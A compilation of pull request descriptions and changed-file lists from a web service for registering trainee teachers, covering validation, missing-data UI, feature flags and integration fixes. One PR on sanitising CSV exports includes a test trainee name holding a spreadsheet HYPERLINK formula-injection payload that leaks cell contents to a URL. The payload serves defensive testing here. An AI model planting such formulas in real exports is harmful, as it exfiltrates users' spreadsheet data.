We already have a feature flag to disable this job in the review 
environment because the generated trainees don’t have complete data.
There is an error occurring in the initialiser for this service despite
It being disabled, so add another check in the initializer to short
circuit even earlier.

[2314] Fix contact update error

---

app/components/apply_applications/trainee_data/view.html.erb
app/components/error_summary/view.html.erb
app/components/error_summary/view.rb
app/views/trainees/check_details/show.html.erb
config/locales/en.yml
spec/components/error_summary/view_preview.rb
spec/components/error_summary/view_spec.rb

- https://trello.com/c/d512BVIB/2317-s-componentise-the-error-summary
- Extracts the error summary partial into a component to be a little more flexible/re-usable
- Initial work to validating the apply draft confirm pages

[2317] Extract error summary partial into a component

---

app/components/collapsed_section/style.scss
app/components/degrees/view.rb
app/components/personal_details/view.html.erb
app/components/personal_details/view.rb
app/view_objects/mappable_field_row.rb
config/locales/en.yml
spec/components/personal_details/view_spec.rb
spec/view_objects/mappable_field_row_spec.rb

https://trello.com/c/ZAn3b2cO/2217-l-apply-draft-confirm-page-invalid-data-row-notice
- Create new view object `MappableFieldRow` that can deal with 2 scenarios within summary components:
- Scenario 1: Field value is nil, but there is invalid information about the field
- Scenario 2: Field value is nil and there's no invalid information
- Update personal details and degree components to use `MappableFieldRow` on those particular attributes that can be in an unmapped state
- Select a trainee imported from Apply
- If a nationality is not provided, it should be displayed as missing
- Click on link to choose nationality
- Missing information should no longer appear
- Select a trainee imported from Apply and make sure it has a degree
- Open rails console and run the follow:
```ruby
trainee = …
```

[2217] Apply draft confirm page invalid data row notice

---

app/components/sections/view.rb
app/views/trainees/check_details/show.html.erb
spec/support/page_objects/trainees/check_details/show.rb

Updating the `check-details` page.
- Change text on submit button as outlined in the Trello ticket
- Switch on the add another degree button
- Navigate to a draft trainee
- Fill out all the details
- Click `Check this record`
- Check that the `Add another degree` button is present on this page
- Check that if you remove all degrees the `Add another degree` button is not present
- Check the updated text on the green button at the bottom of that page (as outlined in Trello)

[2322] Update check-details page

---

app/components/apply_applications/confirm_course/view.rb
app/components/confirm_publish_course/view.rb
app/controllers/concerns/publish_course_next_path.rb
app/controllers/trainees/apply_applications/confirm_courses_controller.rb
app/controllers/trainees/confirm_publish_course_controller.rb
app/controllers/trainees/itt_start_dates_controller.rb
app/controllers/trainees/language_specialisms_controller.rb
app/controllers/trainees/publish_course_details_controller.rb
app/controllers/trainees/subject_specialisms_controller.rb
app/forms/apply_applications/confirm_course_form.rb
app/forms/confirm_publish_course_form.rb
app/forms/itt_start_date_form.rb
app/lib/training_route_manager.rb
app/models/trainee.rb
app/policies/trainee_policy.rb
app/services/form_store.rb
app/views/trainees/apply_applications/confirm_courses/show.html.erb
app/views/trainees/confirm_publish_course/edit.html.erb
app/views/trainees/itt_start_dates/edit.html.erb
config/locales/en.yml
config/routes.rb
spec/components/apply_applications/confirm_course/view_preview.rb
spec/components/confirm_publish_course/view_preview.rb
spec/features/form_sections/teacher_training_data/edit_publish_course_details_spec.rb
spec/forms/confirm_publish_course_form_spec.rb
spec/forms/itt_start_date_form_spec.rb
spec/lib/training_route_manager_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/edit_itt_start_date.rb
spec/support/shared_examples/rendering_course_confirmation.rb

Collect ITT start date for PGTA publish courses
Collect ITT start date for PGTA publish courses
Given a trainee and they are on the  PG teaching apprentice route
When they have selected a publish course to use as template
Then the user is asked for the ITT start date
Trainee
- even if they are from `Apply` & they are on the  PG teaching apprentice route
ITT start date 
- uses trainee's course start date for the itt start date :shrug: 
- after subject specialism selection
There will be a follow up PR to clean address content changes as well
Only applicable if selecting from `teaching apprenticeship postgrad courses in the Publish service`

[2287] Collect ITT start date for PGTA publish courses

---

.github/workflows/build.yml
.github/workflows/delete-review-app.yml
Dockerfile
docker-compose.yml

Improve docker build caching
Move COMMIT_SHA argument to end of the Dockerfile
Tag docker image with base branch name and base commit sha
Remove buildx cache step and just use inline cache

Use commit sha of base branch as docker tag for PR builds

---

app/lib/dttp/params/degree_qualification.rb
app/lib/dttp/params/placement_assignment.rb
spec/lib/dttp/params/degree_qualification_spec.rb
spec/lib/dttp/params/placement_assignment_spec.rb

https://trello.com/c/dBc9YoLt/2376-bug-dttpclienterror-when-attempting-to-register-trn
This field doesn’t exist, and is causing a 400 error when we try to 
send it to dttp. The degree qualifications model only has a degree
end date as a possible value rather than the graduation date, but it 
seems to be null all the time. The degree date obtained is still set
on the placement assignment
It is quite painful to set up the communication with DTTP locally and get a trainee in a valid enough state to run the job manually in the console. It is probably easier if I screen share to demonstrate

[2376] Don’t send degree date obtained as part of degree payload to dttp

---

app/components/sections/view.rb
app/components/task_list/view.rb
app/models/progress.rb
app/services/progress_service.rb
config/locales/en.yml
spec/components/pages/trainees/check_details/view_preview.rb
spec/components/sections/view_spec.rb
spec/components/task_list/view_preview.rb
spec/components/task_list/view_spec.rb
spec/factories/trainees.rb
spec/features/form_sections/personal_and_education_details/degrees/adding_degree_spec.rb
spec/features/form_sections/personal_and_education_details/diversities/diversity_progress_spec.rb
spec/features/form_sections/teacher_training_data/edit_publish_course_details_spec.rb
spec/forms/diversities/disability_disclosure_form_spec.rb
spec/forms/trainee_id_form_spec.rb
spec/forms/trainee_start_date_form_spec.rb
spec/services/progress_service_spec.rb
spec/support/features/page_helpers.rb
spec/support/shared_examples/rendering_the_funding_section.rb

Change the 'not started' tag to `incomplete`
- Check that the change has been made consistently across the codebase as outlined in Trello

[2319] Change the tag 'not started' to 'incomplete'

---

app/components/badges/view.html.erb
app/components/status_card/style.scss

Status card squares have new markup, they are now all the same height and width, and we do not break mid-word.
- Remove hyphens from word breaks
- Make boxes consistent sizes
- Add grid layout (4x2 desktop, 2x4 mobile)
- Navigate to the home page and checkout the status cards.

[2320] Update status card layout and css

---

app/views/trainees/funding/bursaries/_non_tiered_bursary_form.html.erb
app/views/trainees/funding/bursaries/_tiered_bursary_form.html.erb
config/locales/en.yml

https://trello.com/c/yjD1E7ex/2321-s-eyts-snagging-link-to-guidance
- Use the `govuk_link_to` helper to ensure correct classes are applied
- Adds `rel="noreferrer noopener"` (protect against [reverse tab-nabbing](https://owasp.org/www-community/attacks/Reverse_Tabnabbing))
1. Link text is correct blue:
2. Html is correct:

[2321] Use govuk_link_to helper for guidance links

---

app/forms/itt_start_date_form.rb
config/locales/en.yml
spec/forms/itt_start_date_form_spec.rb

ITT start date Validation
ITT start date validation needs to be same as course start date
date rules
- blank
- invalid
- in the future (1 year)
- in the past (10 years)
Should be the same as `course_start_date`

[2364] Added validation for ITT start date

---

app/forms/personal_details_form.rb
app/forms/training_details_form.rb
config/locales/en.yml
spec/forms/personal_details_form_spec.rb
spec/forms/training_details_form_spec.rb

Validating the year field in date forms to avoid `21` be saved as `0021`, for example.
`Note:` I haven't added this validation to the other date fields because they have another form of validation which I think would prevent this issue surfacing?
- Add year validation to `personal details form` ensuring the year is 4 digits.
- Add year validation to `training details form` ensuring the year is 4 digits.
- Navigate to a traine in `Draft` 
- Click on personal details and change the date to something like `1-4-21`
- Ensure the validation kicks in and prevents the date from persisting 
- Ensure the new error message is displayed
- Repeat for the date in the `Trainee start date and ID` section

[2323] Add validation to date forms requiring 4 numbers

---

app/services/exports/trainee_search_data.rb
spec/services/exports/trainee_search_data_spec.rb

Sanitise the free-text data that is output in the CSV file to ensure that Excel does not interpret them as formulae.
For fields starting with any of "=", "+", "-", "@" characters, add a leading apostrophe, to prevent programs like excel interpreting them as formula. 
1. Add a trainee name starting with any of these four characters. I used ` =HYPERLINK("https://localhost:5000?leak="&A1&B1,"Error: please click for further information")`
2. On the trainee records page, choose to export them, and open the csv in excel or openoffice.
3. Expect that the above row is not being interpreted as an excel formula.

[2255] Set quote character to apostrophe for csv generation

---

app/lib/dttp/code_sets/qualification_aims.rb
app/lib/dttp/code_sets/routes.rb

We have a Postgraduate Teaching Apprenticeship route. This PR adds the ITT qualification aims and routes mapping to enable them to be sent to DTTP.
- Add route entity id to params
- Add qualification aims entity id to params
- You could check the qualification aim on the Trello ticket comment and the route in the back office

[2232] Send pgta to dttp

---

app/helpers/task_list_helper.rb
config/locales/en.yml

Fix missing translation on review draft page
- Navigate to a trainee on the `provider-led (postgrad)`
- On the review draft scroll down to the funding section
- The translation should be fixed. 
- Compare with QA/Staging for the broken version

Fix translation bug

---

app/components/provider_card/view.html.erb
app/controllers/application_controller.rb
app/view_objects/system_admin/users_view.rb
app/views/system_admin/dttp_providers/show.html.erb
spec/controllers/application_controller_spec.rb
spec/services/trainees/filter_spec.rb
spec/view_objects/system_admin/users_view_spec.rb

We are now discarding / soft-deleting users using the discard gem.
* Only show `kept` users scoped to providers
* Don't allow deleted users to login
* Exclude discarded users from user counts
One mildly controversial bit of this PR is the way we've used discard. In TTAPI we have set the `kept` scope as a default scope on `user` and `course` associations. I've added it explicitly where required here as I think that makes it more obvious where it is used and leaves the default association returning all users as you would expect when you call it. This is inconsistent between the apps now. Discussion welcomed if anybody disagrees.
Run `discard` against a user
`User.find(97).discard`
Navigate to provider and the user should no longer be listed
`/system-admin/providers/16`
Test the login by …

[2300] Scope provider users to kept

---

app/components/badges/view.html.erb
app/components/badges/view.rb

https://trello.com/c/un6waqU9/2397-bug-qualification-recommended-and-qualification-awarded-homepage-squares-have-incorrect-links
- Fix link urls for the homepage squares "Qualification recommended" and "Qualification awarded"
Before fix "Qualification recommended" pointed to `/trainees?states[]=recommended_for_award`. "recommended_for_award" is not an option in the filters page. It should be pointing to `/trainees?state[]=eyts_recommended&state[]=qts_recommended`. Same goes for "Qualification awarded".
Open the home page. Hover over each square and verify that the url matches the example above.

[2397] Qualification awarded/recommended homepage squares have incorrect links

---

app/components/apply_applications/confirm_course/view.rb
app/components/confirm_publish_course/view.rb
app/components/course_details/view.rb
app/controllers/trainees/course_details_controller.rb
app/forms/course_details_form.rb
app/forms/trainee_form.rb
app/lib/training_route_manager.rb
app/models/trainee.rb
app/views/trainees/course_details/edit.html.erb
app/views/trainees/itt_start_dates/edit.html.erb
config/initializers/training_routes.rb
config/locales/en.yml
spec/components/course_details/view_preview.rb
spec/components/pages/trainees/check_details/view_preview.rb
spec/lib/training_route_manager_spec.rb
spec/support/features/course_details_steps.rb
spec/support/page_objects/trainees/course_details.rb

ITT vs non ITT start and end dates
`Teaching apprenticeship (postgrad)` route, everything should say `ITT start date` or `ITT end date`
Go thro the `Teaching apprenticeship (postgrad)` route, everything should say `ITT start date` or `ITT end date`
https://register-pr-1195.london.cloudapps.digital/trainees/SSLModxSnzXHQKSSTMVdMnuJ
https://register-pr-1195.london.cloudapps.digital/trainees/A3NqSjdZ34bzS8bb5Y5TmFRk/course-details/edit
https://register-pr-1195.london.cloudapps.digital/trainees/A3NqSjdZ34bzS8bb5Y5TmFRk/check-details
https://register-pr-1195.london.cloudapps.digital/trainees/A3NqSjdZ34bzS8bb5Y5TmFRk/course-details/confirm
This should provisional work for the other routes 
- `early_years_undergrad`, 
- `provider_led_undergrad`, 
- `opt_in_undergrad`

[2304] Course dates for routes which should refer to itt dates for itt trainees

---

app/components/badges/view.rb
app/view_objects/home_view.rb
app/views/pages/_badges.html.erb
config/locales/en.yml

https://trello.com/c/0HVNdmrq/2419-bug-fix-missing-homepage-squares
- Fix bug whereby recommended for award and awarded homepage squares weren't appearing for users with only QTS or only EYTS trainees
- Remove heading which related to academic years
Screenshot of Registered trainees section for a user with no EYTS trainees:

[2419] Add back homepage squares for missing states, remove academic year heading

---

app/components/degrees/view.rb
app/components/personal_details/view.html.erb
app/components/personal_details/view.rb
app/controllers/trainees/confirm_details_controller.rb
app/controllers/trainees/degrees/confirm_details_controller.rb
app/controllers/trainees/diversity/confirm_details_controller.rb
app/forms/personal_details_form.rb
app/view_objects/mappable_field_row.rb
app/view_objects/missing_data_view.rb
app/views/trainees/confirm_details/show.html.erb
config/locales/en.yml
spec/components/personal_details/view_spec.rb
spec/view_objects/mappable_field_row_spec.rb

- https://trello.com/c/yxJ5Aw4Z/2366-l-missing-information-ui
This PR implements an approach around handling missing data for confirm pages (this is for the personal details to begin with). The following changes are proposed:
- Form object implements a `missing_fields` validation context
- The method above can be extracted into a module which is included in every form object. Will return keys corresponding to the missing fields (based on existing validation rules)
- The `MissingDataView` then gets the form instance and iterate over these missing fields, looking up the correct display value used by the summary component render the field name correctly (and anchor to it's row correctly)
- The look up display names are re-referenced from other yaml keys in the translation files so they're …

Add missing data summary to all confirm pages (personal details)

---

config/locales/en.yml

Schools heading in `/review-draft` table
Amended `Schools` to be `Lead and employing schools`
:shipit:

[2439] Amended `Schools` to be `Lead and employing schools`

---

app/components/contact_details/view.html.erb
app/components/contact_details/view.rb
app/forms/personal_details_form.rb
app/forms/trainee_form.rb
config/locales/en.yml
spec/components/contact_details/view_spec.rb

- https://trello.com/c/lX1qKKj1/2412-s-missing-information-ui-contact-details
Based on https://github.com/DFE-Digital/register-trainee-teachers/pull/1219. Handles missing data for the contact details confirm page.

[2412] Handle missing information data for contact details confirm

---

.rubocop_todo.yml
app/lib/dttp/params/placement_assignment.rb
spec/lib/dttp/params/placement_assignment_spec.rb

Academic years run 1/8/year -> 31/7/(year + 1).
Up until now we were sending a hardcoded value but we are in a new year now so need new things.
Send the correct academic year based on the course start date to DTTP.
It would be useful to get a check that the correct GUIDs are set. This is an issue in production at the moment so I realise that we could probably move the constants out of params and into a mapping but it would be good to get this deployed this afternoon and we can revisit.

[2446] Send academic year based on start date

---

db/data/20210806100151_update_dttp_ids.rb
db/data_schema.rb

Two trainee records have been deleted in DTTP as they already had a duplicate record. We need to update register to point to the record that has been left.
The record register created has been deleted which isn't how we should handle this.
Data migration to update the DTTP ids. We have made these protected attributes so it has to be done via SQL.
Mostly checking the DTTP Ids which will require prod DTTP access. I can pair on the review.

[xxx] Update dttp_id data migration

---

app/lib/training_route_manager.rb
config/settings.yml
spec/components/review_draft/apply_draft/view_spec.rb
spec/lib/training_route_manager_spec.rb
spec/views/trainees/show.html.erb_spec.rb

We aren't collecting placement info yet. Provider led postgrad was
displaying the placement section in a couple of places with 'Not
required' in the text.
Add a feature flag, set to false, for placement information.
View a the trainee show page or review apply page for a provider led postgrad trainee. No placement details section should be visible.

[xxx] Feature flag placements

---

app/jobs/delete_empty_trainees_job.rb
app/services/find_empty_trainees.rb
app/services/progress_service.rb
app/services/trainees/filter.rb
config/sidekiq_cron_schedule.yml
spec/jobs/delete_empty_trainees_job_spec.rb
spec/services/find_empty_trainees_spec.rb
spec/services/trainees/filter_spec.rb

https://trello.com/c/e74UiITG/2369-spike-work-out-what-to-do-with-empty-drafts
This solution is the outcome of a conversation with @edwardhorsford where we agreed to keep things simple and just hide trainees that don't have any information other than the training route. This means that if the user creates a new trainee but then decideds to abandon it (which ususally happens when providers login to try out the app but don't intend to complete all the sections just yet), we don't bother showing it on the index page. If they want to create trainee with all the details later on, they can create another one.
- New service `FindEmptyTrainees`
- New job `DeleteEmptyTraineesJob` that uses `FindEmptyTrainees`
- Modify `Trainees::Filter` to use `FindEmptyTrainees` so it doens't show empty trainees …

[2369] Hide and remove (periodically) empty trainees

---

app/components/diversity/view.rb
app/forms/diversities/ethnic_background_form.rb
app/forms/diversity_form.rb
config/locales/en.yml
spec/components/diversity/view_spec.rb
spec/factories/trainees.rb
spec/forms/diversities/ethnic_background_form_spec.rb
spec/forms/diversity_form_spec.rb
spec/spec_helper.rb

Add a trainee, and try out various combinations of diversitiy information.

[2413] Add missing information UI for diversity section

---

app/components/degrees/view.html.erb
app/components/summary_card/view.rb
app/forms/degrees_form.rb
app/forms/trainee_form.rb
app/view_objects/mappable_field_row.rb
app/view_objects/missing_data_view.rb
spec/view_objects/mappable_field_row_spec.rb

Followup to https://github.com/DFE-Digital/register-trainee-teachers/pull/1250
For situations with multiple missing information items, this PR ensures that the links reference the correct section.
1. Add a suffix to each attribute anchor where we have multiple items, eg, in a degrees section.

[2414] Enable multiple missing information items with the same label texts

---

app/components/course_details/view.rb
config/locales/en.yml
spec/components/course_details/view_spec.rb

https://trello.com/c/z0IzOjMd/2415-s-missing-information-ui-course-details-section
- Create new trainee
- Visit `http://localhost:3000/trainees/<slug>/course-details/confirm`

[2415] Missing information UI (Course details section)

---

config/settings/production.yml

https://trello.com/c/ldWoOSnZ/2492-turn-on-funding-in-prod
Switch on showing the funding section in production, collecting the data from users on Register.
**This does not switch on sending funding to DTTP** - the work for this is still outstanding. When the work is completed, we can switch on the separate flag `send_funding_to_dttp`.
At that point we will have to re-sync any trainees for which we have collected funding information with DTTP.
🚢

[2492] Switch on funding section in prod

---

app/components/funding/view.html.erb
app/components/funding/view.rb
app/controllers/trainees/confirm_details_controller.rb
app/forms/funding/form_validator.rb
app/view_objects/mappable_field_row.rb
config/locales/en.yml
spec/forms/funding/form_validator_spec.rb

- https://trello.com/c/7yY51giW/2417-s-missing-information-ui-funding-section
Handles missing data for the bursary sections.
If you can't apply for a bursary and come to this page:
If you can apply for a bursary and come to this page:
If you can apply for a bursary but have only completed the first part and then arrived on this page:

[2417] Handle missing data for funding confirm page

---

config/environments/production.rb

Set correct env var to use as the host in the production.rb

[2483] Set correct env var to use as the host in the production.rb

---

app/components/status_tag/view.rb
app/controllers/trainees_controller.rb
app/services/exports/trainee_search_data.rb
spec/services/exports/trainee_search_data_spec.rb

https://trello.com/c/kB2QSJ2I/1402-m-extend-csv-export-to-include-all-fields
* updated export columns to include all from google sheet
* some columns highlighted red on google sheet has been left blank as they are not available for now, can be added in future as they are added.
* From trainee list page click "Export these records"

[1402] Extend csv export to include all fields

---

app/components/degrees/view.html.erb
app/components/degrees/view.rb
app/components/summary_card/view.rb
app/controllers/trainees/degrees/confirm_details_controller.rb
app/forms/degrees_form.rb
app/forms/diversity_form.rb
app/forms/funding/form_validator.rb
app/forms/trainee_form.rb
app/view_objects/mappable_field_row.rb
app/view_objects/missing_data_view.rb
config/locales/en.yml
spec/forms/diversity_form_spec.rb
spec/forms/funding/form_validator_spec.rb
spec/view_objects/mappable_field_row_spec.rb

Add a missing information summary for the degrees section.
A separate followup PR is added https://github.com/DFE-Digital/register-trainee-teachers/pull/1251 to ensure that the links reference the correct section.

[2414] Add Missing Information UI for degrees section

---

app/components/school_details/view.rb
app/components/schools/view.rb
app/controllers/trainees/confirm_details_controller.rb
app/forms/schools/form_validator.rb
app/helpers/school_helper.rb
config/locales/en.yml
spec/components/school_details/view_spec.rb
spec/components/schools/view_preview.rb
spec/forms/schools/form_validator_spec.rb

- https://trello.com/c/eVYW7z0X/2418-s-missing-information-ui-schools-section
- Updates schools view component to handle missing data
- Populate missing fields on the schools validator
- Fix stashing behaviour when updating schools to handle the correct data model
If only lead school is required:
If both schools required but only one is filled out:
If both schools are required and both are missing:

[2418] Handle missing data for schools

---

app/lib/dttp/params/contact.rb
spec/lib/dttp/params/contact_spec.rb

Use "Other" instead of "Not Provided" when sending trainee info over to DTTP.
Use the same DTTP value for other and not provided.

[2498] Map "Not Provided" gender to "Other" in DTTP

---

app/components/record_details/view.html.erb
app/components/record_details/view.rb
config/locales/en.yml
spec/components/record_details/view_spec.rb

- https://trello.com/c/VJMp2jqa/2416-s-missing-information-ui-training-details-section
Applies missing data pattern for non draft summary card (Trainee progress).
https://register-pr-1264.london.cloudapps.digital/trainees/sxgt2p3Mv7qjkv18qHhnxaT4 (select Provider A)

[2494] Handle missing data for trainee progress card

---

spec/components/withdrawal_details/view_spec.rb
spec/factories/trainees.rb
spec/forms/deferral_form_spec.rb

This flaky spec occurs (or at least, one of the ways to consistently reproduce it is) when `withdraw_date` is before `course_start_date`, as that fails [this validation](https://github.com/DFE-Digital/register-trainee-teachers/blob/8152172248e9ed672a5965fe7324600069ab6605/app/forms/multi_date_form.rb#L90-L92)
Ensure that the `withdraw_date` is _always_ after `course_start_date`
1. Change [this line](https://github.com/DFE-Digital/register-trainee-teachers/pull/1276/files#diff-d5bf2b27c5376d38d33850883479ee552e995dd83db79df992120055636ce8d3R235) to be a date before course_start_date, eg:
```ruby
withdraw_date { Faker::Date.between(from: potential_course_start_date - 2.years, to: potential_course_start_date) }
```
2. run `bundle exec rspec spec/forms/withdrawal_form_spec.rb` to reproduce a …

Fix flaky spec due to trainee#withdraw_date

---

app/components/form_components/autocomplete/style.scss
app/components/form_components/autocomplete/view.rb

https://trello.com/c/GX9OzgHH/2440-s-general-snagging-field-width-for-course-details-subject
- Change width of surrounding container using a exisiting ulility class

[2440] Reduce field width of subject fields

---

app/controllers/trainees_controller.rb

https://trello.com/c/diGvXMBv/2514-trainees-csv-export-action-is-stored-in-back-link
* If action is CSV, do not save URL for back link
* Go to trainees list
* Export CSV
* Click into trainee
* Click back link (does it go back to trainees list or does it run CSV export?)

[2514] do not store CSV export url in back link

---

spec/features/trainee_actions/defer_trainee_spec.rb
spec/features/trainee_actions/recording_training_outcome_spec.rb
spec/features/trainee_actions/reinstating_a_trainee_spec.rb
spec/features/trainee_actions/withdraw_trainee_spec.rb
spec/support/features/training_details_steps.rb

Like https://github.com/DFE-Digital/register-trainee-teachers/pull/1276, but for a few feature specs.
To reproduce consistently, change https://github.com/DFE-Digital/register-trainee-teachers/pull/1279/files#diff-4542f56b4800da01aa2acbfafe87de73f462b66adc0328fac7a013c945267b64R21 line to a date before `course_start_date`, eg
```ruby
trainee.course_start_date - 1.day
```
2. See failures when running the four spec files edited in this PR, as the form expects a date _after_ `course_start_date`

Ensure deferral/withdrawal dates are picked after course_start_date

---

app/lib/dttp/code_sets/routes.rb
app/lib/dttp/code_sets/training_initiatives.rb
app/lib/dttp/params/placement_assignment.rb
spec/lib/dttp/params/placement_assignment_spec.rb

https://trello.com/c/sT9mKfas/2411-m-funding-add-future-teaching-scholars-initiative-dttp-mapping
DTTP recognise Future Teaching Scholars as a route, but we want to continue collecting it from users as a training initiative.
This PR does two things to allow this to happen. If a trainee is on Future Teaching Scholars initiative:
1.  Does not attempt to send to DTTP as a training initiative (there is nothing to map it to).
2. Sends the trainees training route as future_teaching_scholars regardless of what actual route they are on.

[2411] Future Teaching Scholars DTTP mapping

---

app/components/record_details/view.rb
spec/components/record_details/view_spec.rb

Fix trainee status translation
- Navigate to a deferred/withdrawn record and click on it 
- Check that the deferral/withdrawal state is displayed by the date

[XXXX] Fix trainee status translation

---

app/components/apply_applications/confirm_course/view.rb
app/services/trainees/create_from_apply.rb
config/locales/en.yml
lib/tasks/example_data.rake
spec/services/trainees/create_from_apply_spec.rb
spec/support/shared_examples/rendering_course_confirmation.rb

Study mode for apply trainees
When importing an `Apply trainee` also import study mode onto trainee 
https://www.apply-for-teacher-training.service.gov.uk/api-docs/reference
requires https://github.com/DFE-Digital/register-trainee-teachers/pull/1249

[2329] Study mode for apply trainees

---

app/lib/dttp/mappable.rb
app/lib/dttp/parsers/account.rb
app/models/dttp/school.rb
app/services/dttp/retrieve_schools.rb
db/migrate/20210816104942_add_status_code_to_dttp_schools.rb
db/schema.rb
spec/factories/dttp/schools.rb
spec/lib/dttp/params/placement_assignment_spec.rb
spec/models/dttp/school_spec.rb
spec/services/dttp/retrieve_schools_spec.rb

https://trello.com/b/BBEuhbHM/publish-register-sprint-board
In order to reduce some of the Sentry noise related to missing school data, we've decided to pull in the entire list of dttp schools into our look up table.
We're also filtering these on a new field `statuscode` (active) which is used to map the status of the dttp school account . This is to reduce the duplicate URNs.
We've also decided to raise if we can't find a school to use so we can intervene manually.
It's quite tricky to test this but you'll have to pull down the dttp school prod data locally using the sidekiq job and interrogate the data. I was able to find a URN for a job that's failing in prod at the moment.

[2518] Pull in all dttp schools but filter on active

---

app/forms/schools/form_validator.rb
app/lib/wizards/schools_step_wizard.rb

- https://trello.com/c/5WhjBOXP/2512-snaggy-snags-school-routes-new-draft-trainee-shows-school-section-in-progress
- Fixes a small regression where schools section status would say `in progress` for a new empty draft trainee.
- Fire up a new schools trainee, assert status is `incomplete`

[2512] Remove redundant property from schools validator fields

---

app/view_objects/home_view.rb
spec/view_objects/home_view_spec.rb

Filter empty drafts on the Home page, to match the count in the trainee listing.
Use the `Trainees::Filter` to ensure that the empty trainee records are filtered out.
1. Start a draft, completed a section then changed route (wiped out all data)
2. Expect that the home page draft count is increased by 1
1. Repeat step 1 above
2. Expect that the home page draft count is not changed.

Filter empty drafts from HomeView count

---

config/settings/sandbox.yml

We have a sandbox environment where we can try things out in a production like environment with stable data.
Update the feature flags for sandbox to enable the same routes as production.
Check the feature flags against `production.yml`. I've changed a couple of the non-route ones as we don't want things like email or DTTP persistence.

[xxx] Sandbox routes == production routes

---

app/controllers/concerns/publish_course_next_path.rb
app/controllers/trainees/itt_start_dates_controller.rb
app/controllers/trainees/study_modes_controller.rb
app/lib/training_route_manager.rb
spec/factories/courses.rb
spec/factories/trainees.rb
spec/features/form_sections/teacher_training_data/edit_publish_course_details_spec.rb
spec/lib/training_route_manager_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/edit_study_mode.rb

Fixing a couple of bugs in the Publish study mode flow as outlined below. 
- Remove `pg_teaching_apprenticeship` from the training routes which are excluded from `requires_study_mode?`
- Make `study_mode` `nil` in the edit action to prevent the answer from saving
- Create a new trainee on the `Teaching apprenticeship (postgrad)` route
- Click on `Course details`
- Select a course which is `full_time_or_part_time` and click `Continue`
- Choose any specialism and click `Continue`
- Enter a `ITT start date` and submit
- Ensure that the `study_mode` question is asked on the next page
- Ensure you can complete the journey. 
- Create a new trainee on a `Provider-led (postgrad)` route
- Click on `Course details`
- Select a course which is `full_time_or_part_time` and click `Continue`
- Select …

[2524] Bugs with publish study mode

---

app/forms/course_details_form.rb
app/forms/multi_date_form.rb
app/forms/personal_details_form.rb
app/forms/trainee_start_date_form.rb
app/forms/training_details_form.rb
app/helpers/dates_helper.rb
app/views/trainees/start_dates/edit.html.erb
app/views/trainees/trainee_ids/edit.html.erb

- https://trello.com/c/FkfxElIY/2507-form-pages-missing-error-summaries
- https://trello.com/c/aWpvIPuC/2432-if-you-leave-the-year-field-blank-when-it-errors-the-field-is-filled-with-0
- Fixes a few issues outlined in the tickets above
Trainee ID & Start date forms
- View an existing non draft trainee, enter an invalid value for one of those forms and assert the error summary is shown (and the title reflects)
Dates
- Submit a personal details form for a non draft trainee with an empty year
- Assert the year field is still empty post validation

[2507] & [2432] - A few niggles

---

lib/tasks/example_data.rake
terraform/modules/paas/variables.tf

We want review app data to persist across app restarts.
* Run db:migrate instead of schema_load
* Make example_data:generate noop if there is already data in the DB.

[xxx] Don't reset review app DB

---

app/services/find_empty_trainees.rb
app/services/trainees/create_timeline.rb
spec/services/find_empty_trainees_spec.rb

- https://trello.com/c/DYRiMEkl/2535-investigate-and-fix-slow-loading-of-trainees-page
Our filtering logic contains a call to a service `FindEmptyTrainees` which attempts to find empty trainees (so they can be filtered out). It does this by running every form object against the progress validator to see whether it's been started or not. Some of these form objects may contain SQL calls to check some associated data (eg personal details/nationalities). Because the service loops over every trainee, the SQL call is repeated for every trainee in the set.
This is evident by the Skylight report:
And the logs:
I think we can just do one SQL look up for draft trainees to find all of the drafts who have empty associated data (degrees, nationalities and disabilities) then check these trainees using …

[2535] Fix slow loading of trainees index page

---

app/components/record_details/view.rb

Currently on prod:
Translation was incorrectly referenced so was being rendered as a missing translation. Fixed.

[xxx] Fix missing translation

---

app/components/course_details/view.rb
app/controllers/trainees/publish_course_details_controller.rb
app/forms/confirm_publish_course_form.rb
spec/components/course_details/view_spec.rb
spec/forms/confirm_publish_course_form_spec.rb

Duplicate course codes
Course uniqueness is defined by course code and provider code
Fixed saving non presented unrelated course onto trainee
Fixed displaying unrelated course to user when confirming the course details
Fixed specialisms unrelated course issue
As per user  journey 
1. user is shown __related__ course details
2. user confirms on the __related__ course details
3. system [saves](https://github.com/DFE-Digital/register-trainee-teacher-data/blob/2529-publish-course-issue-with-duplicate-course-codes/app/forms/confirm_publish_course_form.rb#L53-L56) the __unrelated__ course details
4. user is then shown the __unrelated__ course details along their user journey
5. Shows the user the __unrelated__ course name with all other details from __related__ course details
6. User can click …

[2529] Fixed publish course issue due to duplicate course codes

---

app/webpacker/scripts/global/nationality_select.js
app/webpacker/scripts/global/nationality_select.spec.js

Due to a missing type attribute on the add-nationality button
browsers are assigning it as the [default button](https://html.spec.whatwg.org/#implicit-submission)
This was causing the button action, (in this case adding an extra
nationality input) to be triggered on pressing enter on any of the form inputs.
This change fixes the issue and ensures that the default (submit) button
would be the "Continue" button at the bottom of the page
1. Visit personal details page, and under "nationality" choose "Other"
2. In the newly visible input, add a nationality, and press Enter. Current behaviour is that a new empty input gets added.
3. Verify that a new input does not render automatically by pressing enter on the input.

[2443] Change add-nationality-button to type="button"

---

app/components/apply_applications/trainee_data/view.html.erb
app/view_objects/mappable_field_row.rb
app/view_objects/missing_data_view.rb
app/views/trainees/check_details/show.html.erb
app/views/trainees/confirm_details/show.html.erb
app/views/trainees/diversity/confirm_details/show.html.erb
spec/view_objects/mappable_field_row_spec.rb

- Add Error: prefix to page titles:
- Fix non-working anchors in the error/info summaries
- Add visually hidden Error: against each error inset
- Add govuk-grid-column-two-thirds-from-desktop for
error summaries
Visit confirmation pages manually (to ensure that you are presented with the errors).
Some of the fixes are visually hidden, so they would need to be inspected in the html markup.

[2517] Fix issues with erroring confirm pages

---

config/settings/staging.yml

https://trello.com/c/Acae9iK4/2545-turn-on-sending-funding-to-dttp-in-staging-and-test
Switch on the `send_funding_to_dttp` feature flag in staging so we can test out params.
🚢

[2545] Enable `send_funding_to_dttp` in staging

---

app/components/form_components/autocomplete/script.js
app/components/form_components/schools_autocomplete/script.js
app/components/form_components/tracker.js
app/webpacker/scripts/tracker.spec.js
config/settings/review.yml

https://trello.com/c/PvHGADBh/2482-l-tracking-autocompletes-send-custom-event-to-gtm
For initial testing and write up of SPIKE see:
https://github.com/DFE-Digital/register-trainee-teachers/pull/1224
Adds a `Tracker` with two functions that can be called from autocompletes:
